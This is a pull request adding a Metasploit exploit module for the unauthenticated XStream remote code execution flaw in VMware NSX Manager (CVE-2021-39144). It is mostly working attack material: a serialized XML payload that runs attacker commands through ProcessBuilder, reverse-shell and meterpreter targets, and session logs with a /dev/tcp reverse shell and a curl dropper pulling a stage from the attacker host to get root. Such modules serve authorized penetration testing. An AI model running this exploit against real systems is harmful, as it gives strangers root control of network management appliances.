### PR TITLE
Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream [CVE-2021-39144]

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
+++ b/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
@@ -17,15 +17,15 @@ This module has been tested against VMware NSX Manager (NSX-V) with the specific
 ## Verification Steps
 
 Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
-* Go to  [VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
+* Go to [Download VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
 * Note: You need to be a customer with valid VMware subscriptions
 * Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
 * Open VirtualBox and import the ova file
-* After sucessfull import, start the VM and you have a VMware NSX Manager running which is accessible using url ` https://<nsx-manager-ip>`
-* Credentials to login: User: `admin`, password: `default`
+* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://<nsx-manager-ip>`
+* Credentials to login: user: `admin`, password: `default`
 * Use the module and options below to test the vulnerability...
 
-1. `use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061`
+1. `use use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144`
 1. `set RHOSTS <TARGET HOSTS>`
 1. `set RPORT <port>`
 1. `set LHOST <attacker host ip>`

--- a/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
+++ b/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
@@ -1,0 +1,173 @@
+## Vulnerable Application
+
+VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library [CVE-2022-39144](https://nvd.nist.gov/vuln/detail/CVE-2021-39144).
+VMware has evaluated the severity of this issue to be in the [Critical severity range](https://www.vmware.com/support/policies/security_response.html) with a maximum CVSSv3 base score of [9.8](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+a malicious actor can get remote code execution in the context of `root` on the appliance.
+
+VMware Cloud Foundation `3.x` and more specific NSX Manager Data Center for vSphere up to and including version `6.4.13`
+are vulnerable to Remote Command Injection.
+
+This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:
+
+* VMware NSX Manager
+* Version `6.4.13`
+* Version `6.4.4`
+
+## Verification Steps
+
+Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
+* Go to  [VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
+* Note: You need to be a customer with valid VMware subscriptions
+* Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
+* Open VirtualBox and import the ova file
+* After sucessfull import, start the VM and you have a VMware NSX Manager running which is accessible using url ` https://<nsx-manager-ip>`
+* Credentials to login: User: `admin`, password: `default`
+* Use the module and options below to test the vulnerability...
+
+1. `use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### VMware NSX Manager bash reverse shell
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
+[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000
+
+pwd
+/usr/lib/tanuki/bin
+whoami
+root
+exit
+[*] 192.168.100.5 - Command shell session 14 closed.
+
+```
+
+### VMware NSX Manager meterpreter session
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
+[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
+[*] Sending payload to 192.168.100.5 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.100.5
+[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.100.5
+OS           : NSX Manager 6.4.13 (Linux 4.9.297)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+## Limitations
+The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
+However all VMware NSX Manager versions up to `6.4.13` are vulnerable, except for `6.4.14`, so most detected targets are likely
+to be vulnerable.

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -30,8 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y', # metasploit module author
-          'Sina Kheirkhah, Source Incite', # Security researcher
-          'Steven Seeley,  Source Incite' # Security researcher
+          'Sina Kheirkhah', # Security researcher (Source Incite)
+          'Steven Seeley' # Security researcher (Source Incite)
         ],
         'References' => [
           ['CVE', '2021-39144'],

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # that indicates the target is running VMware NSX Manager (NSX-V)
   # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable
   def check
-    print_status("Checking if #{peer} can be exploited !")
+    print_status("Checking if #{peer} can be exploited.")
     res = check_nsx_v_mgr
     return CheckCode::Unknown('No response received from the target!') unless res
 

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -107,9 +107,9 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management" 
-  # that indicates the target is running VMware NSX Manager (NSX-V) 
-  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable 
+  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"
+  # that indicates the target is running VMware NSX Manager (NSX-V)
+  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable
   def check
     print_status("Checking if #{peer} can be exploited !")
     res = check_nsx_v_mgr
@@ -117,11 +117,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html = res.get_html_document
     html_title = html.at('title')
-    if html_title.nil? 
+    if html_title.nil?
       return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
     else
       return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).') unless html_title.text == 'VMware Appliance Management'
     end
+
     CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')
   end
 

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -97,7 +97,24 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     b64 = Rex::Text.encode_base64(cmd)
     random_uri = SecureRandom.alphanumeric(rand(4..10))
-    xml_payload = %(\n<sorted-set>\n<string>foo</string>\n<dynamic-proxy>\n<interface>java.lang.Comparable</interface>\n<handler class="java.beans.EventHandler">\n<target class="java.lang.ProcessBuilder">\n<command>\n<string>bash</string>\n<string>-c</string>\n<string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>\n</command>\n</target>\n<action>start</action>\n</handler>\n</dynamic-proxy>\n</sorted-set>\n)
+    xml_payload = <<~XML
+      <sorted-set>
+        <string>foo</string>
+        <dynamic-proxy>
+          <interface>java.lang.Comparable</interface>
+          <handler class="java.beans.EventHandler">
+            <target class="java.lang.ProcessBuilder">
+              <command>
+                <string>bash</string>
+                <string>-c</string>
+                <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>
+              </command>
+            </target>
+            <action>start</action>
+          </handler>
+        </dynamic-proxy>
+      </sorted-set>
+    XML
 
     return send_request_cgi({
       'method' => 'PUT',

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     b64 = Rex::Text.encode_base64(cmd)
-    random_uri = SecureRandom.alphanumeric(rand(4..10))
+    random_uri = rand_text_alphanumeric(4..10)
     xml_payload = <<~XML
       <sorted-set>
         <string>foo</string>

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -121,10 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html = res.get_html_document
     html_title = html.at('title')
-    if html_title.nil?
+    if html_title.nil? || html_title.text != 'VMware Appliance Management'
       return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
-    else
-      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).') unless html_title.text == 'VMware Appliance Management'
     end
 
     CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'securerandom'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -27,15 +29,16 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
+          'h00die-gr3y', # metasploit module author
           'Sina Kheirkhah, Source Incite', # Security researcher
-          'Steven Seeley,  Source Incite', # Security researcher
-          'h00die-gr3y' # metasploit module
+          'Steven Seeley,  Source Incite' # Security researcher
         ],
         'References' => [
           ['CVE', '2021-39144'],
           ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],
           ['URL', 'https://kb.vmware.com/s/article/89809'],
-          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html']
+          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],
+          ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']
         ],
         'DisclosureDate' => '2022-10-25',
         'Platform' => ['unix', 'linux'],
@@ -93,12 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     b64 = Rex::Text.encode_base64(cmd)
+    random_uri = SecureRandom.alphanumeric(rand(4..10))
     xml_payload = %(\n<sorted-set>\n<string>foo</string>\n<dynamic-proxy>\n<interface>java.lang.Comparable</interface>\n<handler class="java.beans.EventHandler">\n<target class="java.lang.ProcessBuilder">\n<command>\n<string>bash</string>\n<string>-c</string>\n<string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>\n</command>\n</target>\n<action>start</action>\n</handler>\n</dynamic-proxy>\n</sorted-set>\n)
 
     return send_request_cgi({
       'method' => 'PUT',
       'ctype' => 'application/xml',
-      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', '1337'),
+      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),
       'data' => xml_payload
     })
   rescue StandardError => e

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -1,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMWare NSX Manager XStream unauthenticated RCE',
+        'Description' => %q{
+          VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
+          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
+          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+          a malicious actor can get remote code execution in the context of 'root' on the appliance.
+          VMware Cloud Foundation 3.11 and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
+          are vulnerable to Remote Command Injection.
+
+          This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Sina Kheirkhah, Source Incite', # Security researcher
+          'Steven Seeley,  Source Incite', # Security researcher
+          'h00die-gr3y' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2021-39144'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],
+          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html']
+        ],
+        'DisclosureDate' => '2022-10-25',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    action_id = rand(1..40)
+    return send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'uri' => normalize_uri(target_uri.path, 'res.php'),
+      'vars_post' => {
+        'action' => 'alarm',
+        'id' => "#{action_id};#{cmd}"
+      }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    print_error("Communication error occurred: #{e.message}")
+    return nil
+  end
+
+  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
+  def check
+    print_status("Checking if #{peer} can be exploited!")
+    sleep_time = rand(5..10)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+
+    return Exploit::CheckCode::Unknown('No response received from the target!') unless res
+
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
+
+    CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :in_memory
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -88,8 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
   rescue StandardError => e
     elog("#{peer} - Communication error occurred: #{e.message}", error: e)
-    print_error("Communication error occurred: #{e.message}")
-    return nil
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
   end
 
   def execute_command(cmd, _opts = {})
@@ -122,8 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
   rescue StandardError => e
     elog("#{peer} - Communication error occurred: #{e.message}", error: e)
-    print_error("Communication error occurred: #{e.message}")
-    return nil
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
   end
 
   # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status("Checking if #{peer} can be exploited !")
     res = check_nsx_v_mgr
-    return Exploit::CheckCode::Unknown('No response received from the target!') unless res
+    return CheckCode::Unknown('No response received from the target!') unless res
 
     html = res.get_html_document
     html_title = html.at('title')

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/stopwatch'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -16,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'VMWare NSX Manager XStream unauthenticated RCE',
+        'Name' => 'VMware NSX Manager XStream unauthenticated RCE',
         'Description' => %q{
           VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
           VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
           Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
           a malicious actor can get remote code execution in the context of 'root' on the appliance.
-          VMware Cloud Foundation 3.11 and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
+          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
           are vulnerable to Remote Command Injection.
 
           This module exploits the vulnerability to upload and execute payloads gaining root privileges.
@@ -36,6 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2021-39144'],
           ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],
+          ['URL', 'https://kb.vmware.com/s/article/89809'],
           ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html']
         ],
         'DisclosureDate' => '2022-10-25',
@@ -44,22 +43,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => true,
         'Targets' => [
           [
-            'Unix Command',
-            {
-              'Platform' => 'unix',
-              'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_netcat'
-              }
-            }
-          ],
-          [
             'Unix (In-Memory)',
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Type' => :in_memory
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
             }
           ],
           [
@@ -89,16 +80,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def execute_command(cmd, _opts = {})
-    action_id = rand(1..40)
+  def check_nsx_v_mgr
     return send_request_cgi({
-      'method' => 'POST',
-      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
-      'uri' => normalize_uri(target_uri.path, 'res.php'),
-      'vars_post' => {
-        'action' => 'alarm',
-        'id' => "#{action_id};#{cmd}"
-      }
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.jsp')
     })
   rescue StandardError => e
     elog("#{peer} - Communication error occurred: #{e.message}", error: e)
@@ -106,28 +91,42 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil
   end
 
-  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
-  def check
-    print_status("Checking if #{peer} can be exploited!")
-    sleep_time = rand(5..10)
-    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
-    res, elapsed_time = Rex::Stopwatch.elapsed_time do
-      execute_command("sleep #{sleep_time}")
-    end
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+    xml_payload = %(\n<sorted-set>\n<string>foo</string>\n<dynamic-proxy>\n<interface>java.lang.Comparable</interface>\n<handler class="java.beans.EventHandler">\n<target class="java.lang.ProcessBuilder">\n<command>\n<string>bash</string>\n<string>-c</string>\n<string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>\n</command>\n</target>\n<action>start</action>\n</handler>\n</dynamic-proxy>\n</sorted-set>\n)
 
+    return send_request_cgi({
+      'method' => 'PUT',
+      'ctype' => 'application/xml',
+      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', '1337'),
+      'data' => xml_payload
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    print_error("Communication error occurred: #{e.message}")
+    return nil
+  end
+
+  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management" 
+  # that indicates the target is running VMware NSX Manager (NSX-V) 
+  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable 
+  def check
+    print_status("Checking if #{peer} can be exploited !")
+    res = check_nsx_v_mgr
     return Exploit::CheckCode::Unknown('No response received from the target!') unless res
 
-    print_status("Elapsed time: #{elapsed_time} seconds.")
-    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
-
-    CheckCode::Vulnerable('Successfully tested command injection.')
+    html = res.get_html_document
+    html_title = html.at('title')
+    if html_title.nil? 
+      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
+    else
+      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).') unless html_title.text == 'VMware Appliance Management'
+    end
+    CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')
   end
 
   def exploit
     case target['Type']
-    when :unix_cmd
-      print_status("Executing #{target.name} with #{payload.encoded}")
-      execute_command(payload.encoded)
     when :in_memory
       print_status("Executing #{target.name} with #{payload.encoded}")
       execute_command(payload.encoded)

--- a/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
+++ b/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'securerandom'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 


### PR DESCRIPTION
VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the [Critical severity range](https://www.vmware.com/support/policies/security_response.html) with a maximum CVSSv3 base score of [9.8](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of `root` on the appliance.

VMware Cloud Foundation `3.x` and more specific NSX Manager Data Center for vSphere up to and including version `6.4.13` are vulnerable to Remote Command Injection.

This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:

* VMware NSX Manager
* Version `6.4.13`
* Version `6.4.4`

## Verification

Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
* Go to  [Download VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
* Note: You need to be a customer with valid VMware subscriptions
* Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
* Open VirtualBox and import the ova file
* After successful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://<nsx-manager-ip>`
* Credentials to login: User: `admin`, password: `default`
* Use the module and options below to test the vulnerability...

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144`
- [ ] `set rhosts <target host ip>`
- [ ] `set lhost <attacker host ip>`
- [ ] `exploit`

```
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.5    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
